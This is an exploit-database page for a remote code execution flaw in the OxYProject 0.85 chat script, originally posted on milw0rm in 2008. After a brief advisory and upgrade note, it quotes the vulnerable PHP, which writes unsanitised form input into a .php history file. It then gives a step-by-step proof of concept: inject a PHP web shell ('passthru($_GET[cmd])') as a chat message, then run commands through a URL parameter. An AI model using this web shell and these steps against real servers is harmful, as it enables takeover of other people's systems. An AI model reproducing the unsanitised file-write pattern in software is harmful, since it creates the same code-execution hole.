header-logo
Suggest Exploit
vendor:
OxYProject
by:
TryagOxY
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: OxYProject
Affected Version From: 0.85
Affected Version To: 0.85
Patch Exists: Yes
Related CWE: N/A
CPE: a:oxyproject:oxyproject:0.85
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability

A vulnerability exists in OxYProject 0.85 (edithistory.php) which allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the application.
Source

Exploit-DB raw data:

OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability
Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip
Code Vuln  :
###################Ln 24###################
include('oxycfg.php');

//########################################
//	Editing the Chat History
//########################################

$edit_file = $file['Chat_History'];
$fh = fopen($edit_file, 'a') or die("<meta http-equiv=\"refresh\" content=\"1 ;url=oxybox_submit.php\"><font face=\"arial\">Error occured when submitting your message. <a href=\"javascript: history.go(-1)\">Back</a></font>");
fwrite($fh, "<b><font face=\"arial\" color=" . $_POST["usercolor"] . ">" . $_POST["oxyname"] . " :</font></b> <font color=" . $_POST["msgcolor"] . ">" . $_POST["oxymsg"] . "</font><br>");
fclose($fh);
###################Ln 33###################
In The Page "oxycfg.php"
###################Ln 33###################
$file['Chat_History'] = "oxyhistory.php";
###################Ln 23###################
POC :
Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php 
You'll see In this Page
Username [?]                      Your message has been successfully submitted [X]
              Your Message Here
Username Color [?]  black     Enter Message
In The "Username" Write "Gold_M" 
In The "Your Message Here" Write This Code "<?php passthru($_GET[cmd]); ?>"
Afte All this Click  "Enter Message"
Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir
# Thanx To TryagOxY

# milw0rm.com [2008-04-30]

Navigation

Suggest Exploit

Services By CQR